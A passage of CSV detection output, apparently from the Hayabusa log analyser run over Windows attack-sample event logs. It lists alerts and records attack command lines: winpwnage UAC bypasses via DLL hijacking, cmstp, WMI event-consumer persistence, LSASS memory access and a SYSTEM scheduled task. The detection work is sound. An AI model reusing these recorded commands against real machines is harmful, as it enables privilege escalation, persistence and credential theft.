| LID: 0x136c5 | PID: 2936 | PGUID: 365ABB72-9AE2-5CD6-0000-00106D631700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx 2019-05-11 18:50:27.018 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\ehome\mcx2prov.exe"" | Process: C:\Windows\ehome\Mcx2Prov.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1369b | PID: 2688 | PGUID: 365ABB72-9AE2-5CD6-0000-0010337C1700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx 2019-05-11 18:50:27.030 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\ehome\CRYPTBASE.dll | Process: C:\Windows\ehome\Mcx2Prov.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 2688 | PGUID: 365ABB72-9AE2-5CD6-0000-0010337C1700 | Hash: SHA1=AA3BF7118AE8138859FC0EE9202684C6DA22C176,MD5=3F090AA1CAE8B179F93B2064B8609AE2,SHA256=AC1DD32C41F6002BDF2EB564653FF23E069594CE55F9E22093355084EE28A6FD,IMPHASH=10D8CBCC4D9E244D697F1C09224856DC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx 2019-05-12 01:46:10.125 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13765 | PID: 3812 | PGUID: 365ABB72-FC52-5CD6-0000-0010357F1200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx 2019-05-12 01:46:10.344 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\CRYPTBASE.dll | Process: c:\python27\python.exe | PID: 3812 | PGUID: 365ABB72-FC52-5CD6-0000-0010357F1200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx 2019-05-12 01:46:10.344 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx 2019-05-12 01:46:15.500 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 3884 | PGUID: 
365ABB72-FC57-5CD6-0000-00101FAF1200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
2019-05-12 01:46:15.547 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | PID: 3884 | PGUID: 365ABB72-FC57-5CD6-0000-00101FAF1200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
2019-05-12 01:46:20.531 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 3756 | PGUID: 365ABB72-FC5C-5CD6-0000-001045DB1200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
2019-05-12 01:46:20.828 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1371b | PID: 1256 | PGUID: 365ABB72-FC5C-5CD6-0000-0010E9F61200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
2019-05-12 01:46:26.203 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\System32\migwiz\CRYPTBASE.dll | Process: C:\Windows\System32\migwiz\migwiz.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3240 | PGUID: 365ABB72-FC61-5CD6-0000-0010141A1300 | Hash: SHA1=AA3BF7118AE8138859FC0EE9202684C6DA22C176,MD5=3F090AA1CAE8B179F93B2064B8609AE2,SHA256=AC1DD32C41F6002BDF2EB564653FF23E069594CE55F9E22093355084EE28A6FD,IMPHASH=10D8CBCC4D9E244D697F1C09224856DC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
2019-05-12 01:54:02.071 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13765 | PID: 2028 | PGUID: 365ABB72-FE2A-5CD6-0000-00107E091700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
2019-05-12 01:54:02.305 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\CRYPTBASE.dll | Process: c:\python27\python.exe | PID: 2028 | PGUID: 365ABB72-FE2A-5CD6-0000-00107E091700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
2019-05-12 01:54:02.305 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
2019-05-12 01:54:07.508 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 2956 | PGUID: 365ABB72-FE2F-5CD6-0000-001019201700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
2019-05-12 01:54:07.524 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | PID: 2956 | PGUID: 365ABB72-FE2F-5CD6-0000-001019201700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
2019-05-12 01:54:12.493 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 3688 | PGUID: 365ABB72-FE34-5CD6-0000-0010EB2E1700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
2019-05-12 01:54:12.821 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1371b | PID: 4000 | PGUID: 365ABB72-FE34-5CD6-0000-0010B8481700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
2019-05-12 01:54:18.069 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\System32\sysprep\CRYPTBASE.dll | Process: C:\Windows\System32\sysprep\sysprep.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2572 | PGUID: 365ABB72-FE39-5CD6-0000-001012701700 | Hash: SHA1=AA3BF7118AE8138859FC0EE9202684C6DA22C176,MD5=3F090AA1CAE8B179F93B2064B8609AE2,SHA256=AC1DD32C41F6002BDF2EB564653FF23E069594CE55F9E22093355084EE28A6FD,IMPHASH=10D8CBCC4D9E244D697F1C09224856DC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
2019-05-12 02:10:06.342 +09:00,IEWIN7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx
2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,info,,Logon Type 9 - NewCredentials,User: IEUser | Computer: | IP Addr: ::1 | LID: 0x1bbdce | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx
2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx
2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,high,LatMov,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx
2019-05-12 02:28:17.176 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13765 | PID: 2460 | PGUID: 365ABB72-0631-5CD7-0000-0010C5862100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
2019-05-12 02:28:17.363 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\tmp.ini | Process: c:\python27\python.exe | PID: 2460 | PGUID: 365ABB72-0631-5CD7-0000-0010C5862100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
2019-05-12 02:28:19.567 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmstp.exe"" /au c:\users\ieuser\appdata\local\temp\tmp.ini | Process: C:\Windows\System32\cmstp.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe | LID: 0x13765 | PID: 3840 | PGUID: 365ABB72-0633-5CD7-0000-0010C6A02100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
2019-05-12 02:28:19.567 +09:00,IEWIN7,1,high,PrivEsc | Evas,Bypass UAC via CMSTP,,rules/sigma/process_creation/proc_creation_win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
2019-05-12 02:28:22.598 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} | LID: 0x1371b | PID: 544 | PGUID: 365ABB72-0636-5CD7-0000-0010A6C72100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
2019-05-12 02:28:22.598 +09:00,IEWIN7,13,high,Evas | Exec,CMSTP Execution Registry Event,,rules/sigma/registry_event/sysmon_cmstp_execution_by_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
2019-05-12 02:28:22.598 +09:00,IEWIN7,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
2019-05-12 02:57:49.903 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -5 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x14591 | PID: 3140 | PGUID: 365ABB72-0D1D-5CD7-0000-001020EF1500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:22.809 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x14591 | PID: 1832 | PGUID: 365ABB72-0D3E-5CD7-0000-0010680E1600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:23.215 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer CREATE Name=""BotConsumer23"", ExecutablePath=""c:\Windows\System32\cmd.exe"", CommandLineTemplate=""c:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 3184 | PGUID: 365ABB72-0D3F-5CD7-0000-0010DB251600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:23.340 +09:00,IEWIN7,20,info,,WMI Event Consumer Activity,"Created | Type: Command Line | Name: ""BotConsumer23"" | Dst: ""c:\\Windows\\System32\\cmd.exe"" | User: IEWIN7\IEUser",rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:23.418 +09:00,IEWIN7,21,info,,WMI Event Consumer To Filter Activity,"Created | Consumer: ""CommandLineEventConsumer.Name=\""BotConsumer23\"""" | Filter: ""__EventFilter.Name=\""BotFilter82\""""",rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:23.450 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding CREATE Filter='__EventFilter.Name=""BotFilter82""', Consumer='CommandLineEventConsumer.Name=""BotConsumer23""' | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 3196 | PGUID: 365ABB72-0D3F-5CD7-0000-00108B381600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:23.590 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter CREATE Name=""BotFilter82"", EventNameSpace=""root\cimv2"", QueryLanguage=""WQL"", Query=""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 1616 | PGUID: 365ABB72-0D3F-5CD7-0000-001089471600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:39.746 +09:00,IEWIN7,19,info,,WMI Event Filter Activity,"Created | Namespace: ""root\\cimv2"" | Name: ""BotFilter82"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" | User: IEWIN7\IEUser",rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:50.090 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -Embedding | LID: 0x3e7 | PID: 2544 | PGUID: 365ABB72-0D5A-5CD7-0000-001069031700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:54.762 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\python27\python.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 1832 | Src PGUID: 365ABB72-0D3E-5CD7-0000-0010680E1600 | Tgt PID: 444 | Tgt PGUID: 365ABB72-8693-5CD7-0000-0010F4570000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:54.762 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\python27\python.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 1832 | Src PGUID: 365ABB72-0D3E-5CD7-0000-0010680E1600 | Tgt PID: 492 | Tgt PGUID: 365ABB72-8693-5CD7-0000-0010765E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:54.887 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer WHERE Name=""BotConsumer23"" DELETE | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 2432 | PGUID: 365ABB72-0D5E-5CD7-0000-0010A1141700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:54.903 +09:00,IEWIN7,20,info,,WMI Event Consumer Activity,"Deleted | Type: Command Line | Name: ""BotConsumer23"" | Dst: ""c:\\Windows\\System32\\cmd.exe"" | User: IEWIN7\IEUser",rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:54.981 +09:00,IEWIN7,19,info,,WMI Event Filter Activity,"Deleted | Namespace: ""root\\cimv2"" | Name: ""BotFilter82"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" | User: IEWIN7\IEUser",rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:55.028 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter WHERE Name=""BotFilter82"" DELETE | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 4084 | PGUID: 365ABB72-0D5E-5CD7-0000-0010E6241700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:55.090 +09:00,IEWIN7,21,info,,WMI Event Consumer To Filter Activity,"Deleted | Consumer: ""CommandLineEventConsumer.Name=\""BotConsumer23\"""" | Filter: ""__EventFilter.Name=\""BotFilter82\""""",rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 02:58:55.153 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=""BotFilter82""' DELETE | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 3016 | PGUID: 365ABB72-0D5E-5CD7-0000-001047331700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
2019-05-12 03:10:42.434 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -i 1 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x14591 | PID: 744 | PGUID: 365ABB72-1022-5CD7-0000-00105D081C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx
2019-05-12 03:10:42.637 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\python27\python.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x101ffb | Src PID: 744 | Src PGUID: 365ABB72-1022-5CD7-0000-00105D081C00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-8693-5CD7-0000-0010765E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx
2019-05-12 03:10:42.668 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\lsass.exe | LID: 0x3e7 | PID: 3248 | PGUID: 365ABB72-1022-5CD7-0000-0010DF121C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx
2019-05-12 03:10:42.668 +09:00,IEWIN7,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx
2019-05-12 09:32:24.461 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x1384a | PID: 2740 | PGUID: 365ABB72-6998-5CD7-0000-00104E422200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
2019-05-12 09:32:30.211 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | LID: 0x1384a | PID: 3876 | PGUID: 365ABB72-699E-5CD7-0000-001073582200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
2019-05-12 09:32:30.211 +09:00,IEWIN7,1,high,Exec,Suspicious Add Scheduled Task From User AppData Temp,,rules/sigma/process_creation/proc_creation_win_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx
